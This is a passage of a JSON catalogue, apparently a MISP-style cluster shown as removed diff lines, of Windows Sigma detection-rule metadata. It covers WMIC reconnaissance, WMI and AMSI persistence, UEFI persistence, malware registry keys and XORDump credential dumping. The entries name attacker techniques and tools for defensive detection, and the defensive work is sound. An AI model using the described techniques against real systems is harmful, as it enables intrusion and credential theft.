- "falsepositive": [
- "Unknown"
- ],
- "logsource.category": "process_creation",
- "logsource.product": "windows"
- }
- },
- {
- "description": "Detects suspicious children spawned via the Windows Terminal application which could be a sign of persistence via WindowsTerminal (see references section)",
- "uuid": "8de89e52-f6e1-4b5b-afd1-41ecfa300d48",
- "value": "Suspicious WindowsTerminal Child Processes",
- "meta": {
- "refs": [
- "https://persistence-info.github.io/Data/windowsterminalprofile.html",
- "https://twitter.com/nas_bench/status/1550836225652686848",
- "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_windows_terminal_susp_children.yml"
- ],
- "tags": [
- "attack.execution",
- "attack.persistence"
- ],
- "creation_date": "2022/07/25",
- "filename": "proc_creation_win_windows_terminal_susp_children.yml",
- "author": "Nasreddine Bencherchali",
- "level": "medium",
- "falsepositive": [
- "Other legitimate \"Windows Terminal\" profiles"
- ],
- "logsource.category": "process_creation",
- "logsource.product": "windows"
- }
- },
- {
- "description": "WinPEAS is a script that search for possible paths to escalate privileges on Windows hosts. The checks are explained on book.hacktricks.xyz",
- "uuid": "98b53e78-ebaf-46f8-be06-421aafd176d9",
- "value": "Detect Execution of winPEAS",
- "meta": {
- "refs": [
- "https://github.com/carlospolop/PEASS-ng",
- "https://book.hacktricks.xyz/windows-hardening/windows-local-privilege-escalation",
- "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_winpeas_tool.yml"
- ],
- "tags": [
- "attack.privilege_escalation",
- "attack.t1082",
- "attack.t1087",
- "attack.t1046"
- ],
- "creation_date": "2022/09/19",
- "filename": "proc_creation_win_winpeas_tool.yml",
- "author": "Georg Lauenstein",
- "level": "high",
- "falsepositive": [
- "Other programs that use the same command line flags"
- ],
- "logsource.category": "process_creation",
- "logsource.product": "windows"
- }
- },
- {
- "description": "Detects the Installation of a Exchange Transport Agent",
- "uuid": "83809e84-4475-4b69-bc3e-4aad8568612f",
- "value": "MSExchange Transport Agent Installation",
- "meta": {
- "refs": [
- "https://twitter.com/blueteamsec1/status/1401290874202382336?s=20",
- "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_win_exchange_transportagent.yml"
- ],
- "tags": [
- "attack.persistence",
- "attack.t1505.002"
- ],
- "creation_date": "2021/06/08",
- "filename": "proc_creation_win_win_exchange_transportagent.yml",
- "author": "Tobias Michalski",
- "level": "medium",
- "falsepositive": [
- "Legitimate installations of exchange TransportAgents. AssemblyPath is a good indicator for this."
- ],
- "logsource.category": "process_creation",
- "logsource.product": "windows"
- }
- },
- {
- "description": "Detects execution of wmic utility with the \"computersystem\" flag in order to obtain information about the machine such as the domain, username, model...etc.",
- "uuid": "9d7ca793-f6bd-471c-8d0f-11e68b2f0d2f",
- "value": "Suspicious Get ComputerSystem Information with WMIC",
- "meta": {
- "refs": [
- "https://www.microsoft.com/security/blog/2022/09/07/profiling-dev-0270-phosphorus-ransomware-operations/",
- "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_wmic_computersystem_recon.yml"
- ],
- "tags": [
- "attack.discovery",
- "attack.execution",
- "attack.t1047"
- ],
- "creation_date": "2022/09/08",
- "filename": "proc_creation_win_wmic_computersystem_recon.yml",
- "author": "Nasreddine Bencherchali",
- "level": "medium",
- "falsepositive": [
- "Unknown"
- ],
- "logsource.category": "process_creation",
- "logsource.product": "windows"
- }
- },
- {
- "description": "Adversaries may attempt to find local system groups and permission settings.\nThe knowledge of local system permission groups can help adversaries determine which groups exist and which users belong to a particular group.\nAdversaries may use this information to determine which users have elevated permissions, such as the users found within the local administrators group.\n",
- "uuid": "164eda96-11b2-430b-85ff-6a265c15bf32",
- "value": "Suspicious Get Local Groups Information with WMIC",
- "meta": {
- "refs": [
- "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1069.001/T1069.001.md",
- "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_wmic_group_recon.yml"
- ],
- "tags": [
- "attack.discovery",
- "attack.t1069.001"
- ],
- "creation_date": "2021/12/12",
- "filename": "proc_creation_win_wmic_group_recon.yml",
- "author": "frack113",
- "level": "low",
- "falsepositive": [
- "Unknown"
- ],
- "logsource.category": "process_creation",
- "logsource.product": "windows"
- }
- },
- {
- "description": "Detects wmic known recon method to look for installed hotfixes, often used by pentest and attackers enum scripts",
- "uuid": "dfd2fcb7-8bd5-4daa-b132-5adb61d6ad45",
- "value": "WMIC Hotfix Recon",
- "meta": {
- "refs": [
- "https://github.com/carlospolop/PEASS-ng/blob/fa0f2e17fbc1d86f1fd66338a40e665e7182501d/winPEAS/winPEASbat/winPEAS.bat",
- "https://sushant747.gitbooks.io/total-oscp-guide/content/privilege_escalation_windows.html",
- "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_wmic_hotfix_enum.yml"
- ],
- "tags": [
- "attack.execution",
- "attack.t1047"
- ],
- "creation_date": "2022/06/20",
- "filename": "proc_creation_win_wmic_hotfix_enum.yml",
- "author": "Nasreddine Bencherchali",
- "level": "medium",
- "falsepositive": [
- "Unknown"
- ],
- "logsource.category": "process_creation",
- "logsource.product": "windows"
- }
- },
- {
- "description": "An adversary might use WMI to list Processes running on the compromised host or list installed Software hotfix and patches.",
- "uuid": "221b251a-357a-49a9-920a-271802777cc0",
- "value": "Suspicious WMI Reconnaissance",
- "meta": {
- "refs": [
- "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1047/T1047.md",
- "https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/wmic",
- "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_wmic_reconnaissance.yml"
- ],
- "tags": [
- "attack.execution",
- "attack.t1047"
- ],
- "creation_date": "2022/01/01",
- "filename": "proc_creation_win_wmic_reconnaissance.yml",
- "author": "frack113",
- "level": "medium",
- "falsepositive": [
- "Unknown"
- ],
- "logsource.category": "process_creation",
- "logsource.product": "windows"
- }
- },
- {
- "description": "An adversary might use WMI to execute commands on a remote system",
- "uuid": "e42af9df-d90b-4306-b7fb-05c863847ebd",
- "value": "WMI Remote Command Execution",
- "meta": {
- "refs": [
- "https://securelist.com/moonbounce-the-dark-side-of-uefi-firmware/105468/",
- "https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/wmic",
- "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_wmic_remote_command.yml"
- ],
- "tags": [
- "attack.execution",
- "attack.t1047"
- ],
- "creation_date": "2022/03/13",
- "filename": "proc_creation_win_wmic_remote_command.yml",
- "author": "frack113",
- "level": "medium",
- "falsepositive": [
- "Unknown"
- ],
- "logsource.category": "process_creation",
- "logsource.product": "windows"
- }
- },
- {
- "description": "An adversary might use WMI to check if a certain Remote Service is running on a remote device.\nWhen the test completes, a service information will be displayed on the screen if it exists.\nA common feedback message is that \"No instance(s) Available\" if the service queried is not running.\nA common error message is \"Node - (provided IP or default) ERROR Description =The RPC server is unavailable\" if the provided remote host is unreachable\n",
- "uuid": "09af397b-c5eb-4811-b2bb-08b3de464ebf",
- "value": "WMI Reconnaissance List Remote Services",
- "meta": {
- "refs": [
- "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1047/T1047.md",
- "https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/wmic",
- "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_wmic_remote_service.yml"
- ],
- "tags": [
- "attack.execution",
- "attack.t1047"
- ],
- "creation_date": "2022/01/01",
- "filename": "proc_creation_win_wmic_remote_service.yml",
- "author": "frack113",
- "level": "medium",
- "falsepositive": [
- "Unknown"
- ],
- "logsource.category": "process_creation",
- "logsource.product": "windows"
- }
- },
- {
- "description": "Uninstall an application with wmic",
- "uuid": "b53317a0-8acf-4fd1-8de8-a5401e776b96",
- "value": "WMI Uninstall An Application",
- "meta": {
- "refs": [
- "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1047/T1047.md#atomic-test-10---application-uninstall-using-wmic",
- "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_wmic_remove_application.yml"
- ],
- "tags": [
- "attack.execution",
- "attack.t1047"
- ],
- "creation_date": "2022/01/28",
- "filename": "proc_creation_win_wmic_remove_application.yml",
- "author": "frac113",
- "level": "medium",
- "falsepositive": [
- "Unknown"
- ],
- "logsource.category": "process_creation",
- "logsource.product": "windows"
- }
- },
- {
- "description": "Detects usage of wmic to start or stop a service",
- "uuid": "0b7163dc-7eee-4960-af17-c0cd517f92da",
- "value": "WMIC Service Start/Stop",
- "meta": {
- "refs": [
- "https://sushant747.gitbooks.io/total-oscp-guide/content/privilege_escalation_windows.html",
- "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_wmic_service.yml"
- ],
- "tags": [
- "attack.execution",
- "attack.t1047"
- ],
- "creation_date": "2022/06/20",
- "filename": "proc_creation_win_wmic_service.yml",
- "author": "Nasreddine Bencherchali",
- "level": "medium",
- "falsepositive": [
- "Unknown"
- ],
- "logsource.category": "process_creation",
- "logsource.product": "windows"
- }
- },
- {
- "description": "Detects wmic known recon method to look for unquoted service paths, often used by pentest and attackers enum scripts",
- "uuid": "68bcd73b-37ef-49cb-95fc-edc809730be6",
- "value": "WMIC Unquoted Services Path Lookup",
- "meta": {
- "refs": [
- "https://github.com/nccgroup/redsnarf/blob/35949b30106ae543dc6f2bc3f1be10c6d9a8d40e/redsnarf.py",
- "https://github.com/S3cur3Th1sSh1t/Creds/blob/eac23d67f7f90c7fc8e3130587d86158c22aa398/PowershellScripts/jaws-enum.ps1",
- "https://www.absolomb.com/2018-01-26-Windows-Privilege-Escalation-Guide/",
- "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_wmic_unquoted_service_search.yml"
- ],
- "tags": [
- "attack.execution",
- "attack.t1047"
- ],
- "creation_date": "2022/06/20",
- "filename": "proc_creation_win_wmic_unquoted_service_search.yml",
- "author": "Nasreddine Bencherchali",
- "level": "medium",
- "falsepositive": [
- "Unknown"
- ],
- "logsource.category": "process_creation",
- "logsource.product": "windows"
- }
- },
- {
- "description": "Detects wmiprvse spawning processes",
- "uuid": "d21374ff-f574-44a7-9998-4a8c8bf33d7d",
- "value": "Wmiprvse Spawning Process",
- "meta": {
- "refs": [
- "https://threathunterplaybook.com/notebooks/windows/02_execution/WIN-190810201010.html",
- "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_wmiprvse_spawning_process.yml"
- ],
- "tags": [
- "attack.execution",
- "attack.t1047"
- ],
- "creation_date": "2019/08/15",
- "filename": "proc_creation_win_wmiprvse_spawning_process.yml",
- "author": "Roberto Rodriguez @Cyb3rWard0g",
- "level": "high",
- "falsepositive": [
- "Unknown"
- ],
- "logsource.category": "process_creation",
- "logsource.product": "windows"
- }
- },
- {
- "description": "Detects a WMI backdoor in Exchange Transport Agents via WMI event filters",
- "uuid": "797011dc-44f4-4e6f-9f10-a8ceefbe566b",
- "value": "WMI Backdoor Exchange Transport Agent",
- "meta": {
- "refs": [
- "https://twitter.com/cglyer/status/1182389676876980224",
- "https://twitter.com/cglyer/status/1182391019633029120",
- "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_wmi_backdoor_exchange_transport_agent.yml"
- ],
- "tags": [
- "attack.persistence",
- "attack.t1546.003"
- ],
- "creation_date": "2019/10/11",
- "filename": "proc_creation_win_wmi_backdoor_exchange_transport_agent.yml",
- "author": "Florian Roth",
- "level": "critical",
- "falsepositive": [
- "Unknown"
- ],
- "logsource.category": "process_creation",
- "logsource.product": "windows"
- }
- },
- {
- "description": "Detects WMI script event consumers",
- "uuid": "ec1d5e28-8f3b-4188-a6f8-6e8df81dc28e",
- "value": "WMI Persistence - Script Event Consumer",
- "meta": {
- "refs": [
- "https://www.eideon.com/2018-03-02-THL03-WMIBackdoors/",
- "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_wmi_persistence_script_event_consumer.yml"
- ],
- "tags": [
- "attack.persistence",
- "attack.privilege_escalation",
- "attack.t1546.003"
- ],
- "creation_date": "2018/03/07",
- "filename": "proc_creation_win_wmi_persistence_script_event_consumer.yml",
- "author": "Thomas Patzke",
- "level": "medium",
- "falsepositive": [
- "Legitimate event consumers",
- "Dell computers on some versions register an event consumer that is known to cause false positives when brightness is changed by the corresponding keyboard button"
- ],
- "logsource.category": "process_creation",
- "logsource.product": "windows"
- }
- },
- {
- "description": "Detects WMI spawning a PowerShell process",
- "uuid": "692f0bec-83ba-4d04-af7e-e884a96059b6",
- "value": "WMI Spawning Windows PowerShell",
- "meta": {
- "refs": [
- "https://any.run/report/68bc255f9b0db6a0d30a8f2dadfbee3256acfe12497bf93943bc1eab0735e45e/a2385d6f-34f7-403c-90d3-b1f9d2a90a5e",
- "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_wmi_spwns_powershell.yml"
- ],
- "tags": [
- "attack.execution",
- "attack.t1047",
- "attack.t1059.001"
- ],
- "creation_date": "2019/04/03",
- "filename": "proc_creation_win_wmi_spwns_powershell.yml",
- "author": "Markus Neis / @Karneades",
- "level": "high",
- "falsepositive": [
- "AppvClient",
- "CCM"
- ],
- "logsource.category": "process_creation",
- "logsource.product": "windows"
- }
- },
- {
- "description": "Detects invocation of Microsoft Workflow Compiler, which may permit the execution of arbitrary unsigned code.",
- "uuid": "419dbf2b-8a9b-4bea-bf99-7544b050ec8d",
- "value": "Microsoft Workflow Compiler",
- "meta": {
- "refs": [
- "https://posts.specterops.io/arbitrary-unsigned-code-execution-vector-in-microsoft-workflow-compiler-exe-3d9294bc5efb",
- "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1218/T1218.md",
- "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_workflow_compiler.yml"
- ],
- "tags": [
- "attack.defense_evasion",
- "attack.execution",
- "attack.t1127",
- "attack.t1218"
- ],
- "creation_date": "2019/01/16",
- "filename": "proc_creation_win_workflow_compiler.yml",
- "author": "Nik Seetharaman, frack113",
- "level": "high",
- "falsepositive": [
- "Legitimate MWC use (unlikely in modern enterprise environments)"
- ],
- "logsource.category": "process_creation",
- "logsource.product": "windows"
- }
- },
- {
- "description": "Detects execution of the binary \"wpbbin\" which is used as part of the UEFI based persistence method described in the reference section",
- "uuid": "4abc0ec4-db5a-412f-9632-26659cddf145",
- "value": "UEFI Persistence Via Wpbbin - ProcessCreation",
- "meta": {
- "refs": [
- "https://grzegorztworek.medium.com/using-uefi-to-inject-executable-files-into-bitlocker-protected-drives-8ff4ca59c94c",
- "https://persistence-info.github.io/Data/wpbbin.html",
- "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_wpbbin_persistence.yml"
- ],
- "tags": [
- "attack.persistence",
- "attack.defense_evasion",
- "attack.t1542.001"
- ],
- "creation_date": "2022/07/18",
- "filename": "proc_creation_win_wpbbin_persistence.yml",
- "author": "Nasreddine Bencherchali",
- "level": "high",
- "falsepositive": [
- "Legitimate usage of the file by hardware manufacturer such as lenovo (Thanks @0gtweet for the tip)"
- ],
- "logsource.category": "process_creation",
- "logsource.product": "windows"
- }
- },
- {
- "description": "Looks for changes to registry to disable any write-protect property for storage devices. This could be a precursor to a ransomware attack and has been an observed technique used by cypherpunk group.",
- "uuid": "75f7a0e2-7154-4c4d-9eae-5cdb4e0a5c13",
- "value": "Write Protect For Storage Disabled",
- "meta": {
- "refs": [
- "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_write_protect_for_storage_disabled.yml"
- ],
- "tags": [
- "attack.defense_evasion",
- "attack.t1562"
- ],
- "creation_date": "2021/06/11",
- "filename": "proc_creation_win_write_protect_for_storage_disabled.yml",
- "author": "Sreeman",
- "level": "medium",
- "falsepositive": [
- "Unknown"
- ],
- "logsource.category": "process_creation",
- "logsource.product": "windows"
- }
- },
- {
- "description": "Detects the presence of the keywords \"Wscript\", \"Shell\" and \"Run\" in the command, which could indicate a suspicious activity",
- "uuid": "2c28c248-7f50-417a-9186-a85b223010ee",
- "value": "Wscript Shell Run In CommandLine",
- "meta": {
- "refs": [
- "http://blog.talosintelligence.com/2022/08/modernloader-delivers-multiple-stealers.html",
- "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_wscript_shell_cli.yml"
- ],
- "tags": [
- "attack.execution",
- "attack.t1059"
- ],
- "creation_date": "2022/08/31",
- "filename": "proc_creation_win_wscript_shell_cli.yml",
- "author": "Nasreddine Bencherchali",
- "level": "high",
- "falsepositive": [
- "Rare legitimate inline scripting by some administrators"
- ],
- "logsource.category": "process_creation",
- "logsource.product": "windows"
- }
- },
- {
- "description": "Detects usage of wsudo (Windows Sudo Utility). Which is a tool that let the user execute programs with different permissions (System, Trusted Installer, Administrator...etc)",
- "uuid": "bdeeabc9-ff2a-4a51-be59-bb253aac7891",
- "value": "Wsudo Suspicious Execution",
- "meta": {
- "refs": [
- "https://github.com/M2Team/Privexec/",
- "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_wsudo_susp_execution.yml"
- ],
- "tags": [
- "attack.execution",
- "attack.privilege_escalation",
- "attack.t1059"
- ],
- "creation_date": "2022/12/02",
- "filename": "proc_creation_win_wsudo_susp_execution.yml",
- "author": "Nasreddine Bencherchali",
- "level": "high",
- "falsepositive": [
- "Unknown"
- ],
- "logsource.category": "process_creation",
- "logsource.product": "windows"
- }
- },
- {
- "description": "Detects usage of the \"wusa.exe\" (Windows Update Standalone Installer) utility to extract cab using the \"/extract\" argument which is not longer supported. This could indicate an attacker using an old technique",
- "uuid": "59b39960-5f9d-4a49-9cef-1e4d2c1d0cb9",
- "value": "Wusa Extracting Cab Files",
- "meta": {
- "refs": [
- "https://web.archive.org/web/20180331144337/https://www.fireeye.com/blog/threat-research/2018/03/sanny-malware-delivery-method-updated-in-recently-observed-attacks.html",
- "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_wusa_susp_cab_extraction.yml"
- ],
- "tags": [
- "attack.execution"
- ],
- "creation_date": "2022/08/04",
- "filename": "proc_creation_win_wusa_susp_cab_extraction.yml",
- "author": "Nasreddine Bencherchali",
- "level": "medium",
- "falsepositive": [
- "The \"extract\" flag still works on older 'wusa.exe' versions, which could be a legitimate use (monitor the path of the cab being extracted)"
- ],
- "logsource.category": "process_creation",
- "logsource.product": "windows"
- }
- },
- {
- "description": "Detects usage of the \"wusa.exe\" (Windows Update Standalone Installer) utility to extract cab using the \"/extract\" argument from suspicious paths",
- "uuid": "c74c0390-3e20-41fd-a69a-128f0275a5ea",
- "value": "Wusa Extracting Cab Files From Suspicious Paths",
- "meta": {
- "refs": [
- "https://web.archive.org/web/20180331144337/https://www.fireeye.com/blog/threat-research/2018/03/sanny-malware-delivery-method-updated-in-recently-observed-attacks.html",
- "https://www.echotrail.io/insights/search/wusa.exe/",
- "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_wusa_susp_cap_extraction_from_susp_paths.yml"
- ],
- "tags": [
- "attack.execution"
- ],
- "creation_date": "2022/08/05",
- "filename": "proc_creation_win_wusa_susp_cap_extraction_from_susp_paths.yml",
- "author": "Nasreddine Bencherchali",
- "level": "high",
- "falsepositive": [
- "Unknown"
- ],
- "logsource.category": "process_creation",
- "logsource.product": "windows"
- }
- },
- {
- "description": "Detects suspicious use of XORDump process memory dumping utility",
- "uuid": "66e563f9-1cbd-4a22-a957-d8b7c0f44372",
- "value": "XORDump Use",
- "meta": {
- "refs": [
- "https://github.com/audibleblink/xordump",
- "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_xordump.yml"
- ],
- "tags": [
- "attack.defense_evasion",
- "attack.t1036",
- "attack.t1003.001"
- ],
- "creation_date": "2022/01/28",
- "filename": "proc_creation_win_xordump.yml",
- "author": "Florian Roth",
- "level": "high",
- "falsepositive": [
- "Another tool that uses the command line switches of XORdump"
- ],
- "logsource.category": "process_creation",
- "logsource.product": "windows"
- }
- },
- {
- "description": "Extensible Stylesheet Language (XSL) files are commonly used to describe the processing and rendering of data within XML files. Rule detects when adversaries abuse this functionality to execute arbitrary files while potentially bypassing application whitelisting defenses.",
- "uuid": "05c36dd6-79d6-4a9a-97da-3db20298ab2d",
- "value": "XSL Script Processing",
- "meta": {
- "refs": [
- "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1220/T1220.md",
- "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_xsl_script_processing.yml"
- ],
- "tags": [
- "attack.defense_evasion",
- "attack.t1220"
- ],
- "creation_date": "2019/10/21",
- "filename": "proc_creation_win_xsl_script_processing.yml",
- "author": "Timur Zinniatullin, oscd.community",
- "level": "medium",
- "falsepositive": [
- "WMIC.exe FP depend on scripts and administrative methods used in the monitored environment.",
- "Msxsl.exe is not installed by default, so unlikely.",
- "Static format arguments - https://petri.com/command-line-wmi-part-3"
- ],
- "logsource.category": "process_creation",
- "logsource.product": "windows"
- }
- },
- {
- "description": "Raw disk access using illegitimate tools, possible defence evasion",
- "uuid": "db809f10-56ce-4420-8c86-d6a7d793c79c",
- "value": "Raw Disk Access Using Illegitimate Tools",
- "meta": {
- "refs": [
- "https://www.slideshare.net/heirhabarov/hunting-for-credentials-dumping-in-windows-environment",
- "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/raw_access_thread/raw_access_thread_disk_access_using_illegitimate_tools.yml"
- ],
- "tags": [
- "attack.defense_evasion",
- "attack.t1006"
- ],
- "creation_date": "2019/10/22",
- "filename": "raw_access_thread_disk_access_using_illegitimate_tools.yml",
- "author": "Teymur Kheirkhabarov, oscd.community",
- "level": "low",
- "falsepositive": [
- "Legitimate Administrator using tool for raw access or ongoing forensic investigation"
- ],
- "logsource.category": "raw_access_thread",
- "logsource.product": "windows"
- }
- },
- {
- "description": "Detects when an attacker registers a new AMSI provider in order to achieve persistence",
- "uuid": "33efc23c-6ea2-4503-8cfe-bdf82ce8f705",
- "value": "Persistence Via New AMSI Providers",
- "meta": {
- "refs": [
- "https://persistence-info.github.io/Data/amsi.html",
- "https://github.com/gtworek/PSBits/blob/8d767892f3b17eefa4d0668f5d2df78e844f01d8/FakeAMSI/FakeAMSI.c",
- "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_add/registry_add_amsi_providers_persistence.yml"
- ],
- "tags": [
- "attack.persistence"
- ],
- "creation_date": "2022/07/21",
- "filename": "registry_add_amsi_providers_persistence.yml",
- "author": "Nasreddine Bencherchali",
- "level": "high",
- "falsepositive": [
- "Legitimate security products adding their own AMSI providers"
- ],
- "logsource.category": "registry_add",
- "logsource.product": "windows"
- }
- },
- {
- "description": "Detects creation of UserInitMprLogonScript persistence method",
- "uuid": "9ace0707-b560-49b8-b6ca-5148b42f39fb",
- "value": "Logon Scripts Creation in UserInitMprLogonScript Registry",
- "meta": {
- "refs": [
- "https://attack.mitre.org/techniques/T1037/",
- "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1037.001/T1037.001.md", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_add/registry_add_logon_scripts_userinitmprlogonscript_reg.yml" - ], - "tags": [ - "attack.t1037.001", - "attack.persistence", - "attack.lateral_movement" - ], - "creation_date": "2019/01/12", - "filename": "registry_add_logon_scripts_userinitmprlogonscript_reg.yml", - "author": "Tom Ueltschi (@c_APT_ure)", - "level": "high", - "falsepositive": [ - "Exclude legitimate logon scripts" - ], - "logsource.category": "registry_add", - "logsource.product": "windows" - } - }, - { - "description": "Attempts to detect registry events for common NetWire key HKCU\\Software\\NetWire", - "uuid": "1d218616-71b0-4c40-855b-9dbe75510f7f", - "value": "NetWire RAT Registry Key", - "meta": { - "refs": [ - "https://www.fortinet.com/blog/threat-research/new-netwire-rat-variant-spread-by-phishing", - "https://resources.infosecinstitute.com/topic/netwire-malware-what-it-is-how-it-works-and-how-to-prevent-it-malware-spotlight/", - "https://unit42.paloaltonetworks.com/guloader-installing-netwire-rat/", - "https://blogs.blackberry.com/en/2021/09/threat-thursday-netwire-rat-is-coming-down-the-line", - "https://app.any.run/tasks/41ecdbde-4997-4301-a350-0270448b4c8f/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_add/registry_add_mal_netwire.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1112" - ], - "creation_date": "2021/10/07", - "filename": "registry_add_mal_netwire.yml", - "author": "Christopher Peacock", - "level": "high", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "registry_add", - "logsource.product": "windows" - } - }, - { - "description": "Detects new registry key created by Ursnif malware.", - "uuid": "21f17060-b282-4249-ade0-589ea3591558", - "value": "Ursnif", - "meta": { - "refs": [ - 
"https://blog.yoroi.company/research/ursnif-long-live-the-steganography/", - "https://blog.trendmicro.com/trendlabs-security-intelligence/phishing-campaign-uses-hijacked-emails-to-deliver-ursnif-by-replying-to-ongoing-threads/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_add/registry_add_mal_ursnif.yml" - ], - "tags": [ - "attack.execution", - "attack.t1112" - ], - "creation_date": "2019/02/13", - "filename": "registry_add_mal_ursnif.yml", - "author": "megan201296", - "level": "high", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "registry_add", - "logsource.product": "windows" - } - }, - { - "description": "Detects COM object hijacking via TreatAs subkey", - "uuid": "9b0f8a61-91b2-464f-aceb-0527e0a45020", - "value": "Windows Registry Persistence COM Key Linking", - "meta": { - "refs": [ - "https://bohops.com/2018/08/18/abusing-the-com-registry-structure-part-2-loading-techniques-for-evasion-and-persistence/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_add/registry_add_persistence_key_linking.yml" - ], - "tags": [ - "attack.persistence", - "attack.t1546.015" - ], - "creation_date": "2019/10/23", - "filename": "registry_add_persistence_key_linking.yml", - "author": "Kutepov Anton, oscd.community", - "level": "medium", - "falsepositive": [ - "Maybe some system utilities in rare cases use linking keys for backward compatibility" - ], - "logsource.category": "registry_add", - "logsource.product": "windows" - } - }, - { - "description": "Detects the of the \"accepteula\" key related to sysinternals tools being created from non sysinternals tools", - "uuid": "f50f3c09-557d-492d-81db-9064a8d4e211", - "value": "Usage of Renamed Sysinternals Tools", - "meta": { - "refs": [ - "Internal Research", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_add/registry_add_renamed_sysinternals_eula_accepted.yml" - ], - "tags": [ - "attack.resource_development", - 
"attack.t1588.002" - ], - "creation_date": "2022/08/24", - "filename": "registry_add_renamed_sysinternals_eula_accepted.yml", - "author": "Nasreddine Bencherchali", - "level": "high", - "falsepositive": [ - "Unlikely" - ], - "logsource.category": "registry_add", - "logsource.product": "windows" - } - }, - { - "description": "Detects the usage of Suspicious Sysinternals Tools such as PsExec, Procdump...etc via the \"accepteula\" key being added to Registry", - "uuid": "c7da8edc-49ae-45a2-9e61-9fd860e4e73d", - "value": "Usage of Suspicious Sysinternals Tools", - "meta": { - "refs": [ - "https://twitter.com/Moti_B/status/1008587936735035392", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_add/registry_add_susp_sysinternals_eula_accepted.yml" - ], - "tags": [ - "attack.resource_development", - "attack.t1588.002" - ], - "creation_date": "2022/08/24", - "filename": "registry_add_susp_sysinternals_eula_accepted.yml", - "author": "Nasreddine Bencherchali", - "level": "medium", - "falsepositive": [ - "Legitimate use of SysInternals tools" - ], - "logsource.category": "registry_add", - "logsource.product": "windows" - } - }, - { - "description": "Detects the usage of Sysinternals Tools due to accepteula key being added to Registry", - "uuid": "25ffa65d-76d8-4da5-a832-3f2b0136e133", - "value": "Usage of Sysinternals Tools - Registry", - "meta": { - "refs": [ - "https://twitter.com/Moti_B/status/1008587936735035392", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_add/registry_add_sysinternals_eula_accepted.yml" - ], - "tags": [ - "attack.resource_development", - "attack.t1588.002" - ], - "creation_date": "2017/08/28", - "filename": "registry_add_sysinternals_eula_accepted.yml", - "author": "Markus Neis", - "level": "low", - "falsepositive": [ - "Legitimate use of SysInternals tools", - "Programs that use the same Registry Key" - ], - "logsource.category": "registry_add", - "logsource.product": "windows" - } - }, 
